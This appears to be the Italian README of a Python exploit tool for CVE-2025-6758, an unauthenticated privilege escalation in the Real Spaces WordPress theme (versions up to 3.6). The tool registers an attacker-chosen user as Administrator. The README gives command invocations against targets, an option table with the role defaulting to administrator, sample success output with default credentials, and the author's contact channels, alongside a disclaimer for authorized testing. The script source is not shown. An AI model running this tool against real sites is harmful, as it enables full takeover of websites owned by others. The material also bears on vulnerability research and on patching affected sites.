
Real Spaces - Tema WordPress Properties Directory <= 3.6 - Escalation di privilegi non autenticata ad Amministratore
imic_agent_registerCVE-2025-6758
Punteggio CVSS: 9.8 (Critico)
Il Real Spaces - WordPress Properties Directory Theme per WordPress è vulnerabile all'escalation dei privilegi tramite la funzione imic_agent_register in tutte le versioni fino alla 3.6 inclusa.
Questa vulnerabilità deriva da restrizioni insufficienti sull'assegnazione dei ruoli durante la registrazione, consentendo ad attaccanti non autenticati di specificare arbitrariamente il proprio ruolo, incluso Administrator, durante la registrazione di un nuovo utente.
Questa falla critica consente ad attaccanti remoti di ottenere pieno accesso amministrativo ai siti WordPress che eseguono versioni vulnerabili del tema, compromettendo l'integrità e la sicurezza del sistema interessato.
CVE-2025-6758.py è uno script professionale di exploit e automazione scritto in Python per dimostrare e sfruttare questa vulnerabilità.
Lo script è progettato per penetration tester e ricercatori di sicurezza, offrendo scoperta automatizzata, estrazione del nonce e sfruttamento in modo altamente affidabile, modulare e silenzioso.
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username Imposta nome utente personalizzato (predefinito: Nxploited)--password Imposta password personalizzata (predefinito: 123456789)--email Imposta email personalizzata (predefinito: [email protected])--position Imposta posizione personalizzata (predefinito: Nxploitedadmin)--role Imposta ruolo utente (predefinito: administrator)--max-pages Numero massimo di pagine da esplorare per la scoperta del nonce (predefinito: 30)--max-depth Profondità massima di esplorazione dei collegamenti (predefinito: 2)--scan-common-paths Analizza percorsi aggiuntivi di registrazione/plugin/tema--ajax-path Endpoint AJAX POST personalizzato (predefinito: wp-admin/admin-ajax.php)--verify-ssl Abilita la verifica del certificato SSL--cookie-save Percorso per salvare i cookie di sessionepython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
In caso di exploit riuscito, lo script restituirà:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
Se l'exploit fallisce o il nonce non viene trovato, verranno mostrati messaggi di errore descrittivi e suggerimenti per la risoluzione dei problemi.
Questo script è destinato esclusivamente a scopi educativi, di ricerca e di test di penetrazione autorizzati.
Qualsiasi uso non autorizzato contro siti web o sistemi senza l'esplicito permesso scritto del proprietario è severamente proibito e potrebbe essere illegale.
L'autore non si assume alcuna responsabilità per usi impropri o danni derivanti dall'utilizzo di questo script.
📧 Email: [email protected]
📨 Telegram: @Kxploit
📡 Canale Telegram: @KNxploited
By: Nxploited ( Khaled Alenazi )
| Argomento | Valore predefinito | Descrizione |
|---|
--username | Nxploited | Imposta un nome utente personalizzato per la registrazione |
--password | 123456789 | Imposta una password personalizzata per la registrazione |
--email | [email protected] | Imposta un indirizzo email personalizzato |
--position | Nxploitedadmin | Imposta un valore di posizione personalizzato |
--role | administrator | Imposta il ruolo di registrazione (Amministratore consigliato per l'exploit) |
--max-pages | 30 | Numero massimo di pagine da esplorare per la scoperta del nonce |
--max-depth | 2 | Profondità massima di esplorazione dei collegamenti |
--scan-common-paths | None | Analizza percorsi aggiuntivi di registrazione/plugin/tema per il nonce (solo flag) |
--ajax-path | wp-admin/admin-ajax.php | Endpoint AJAX POST personalizzato |
--verify-ssl | None | Abilita la verifica del certificato SSL (solo flag) |
--cookie-save | None | Percorso per salvare i cookie di sessione (formato pickle) |
--save-json | None | Percorso per salvare i risultati della scoperta del nonce come JSON |
--debug | None | Abilita la registrazione di debug e stampa snippet HTML/JS (solo flag) |
--save-json Percorso per salvare i risultati della scoperta del nonce come JSON--debug Abilita la registrazione di debug e stampa snippet HTML/JS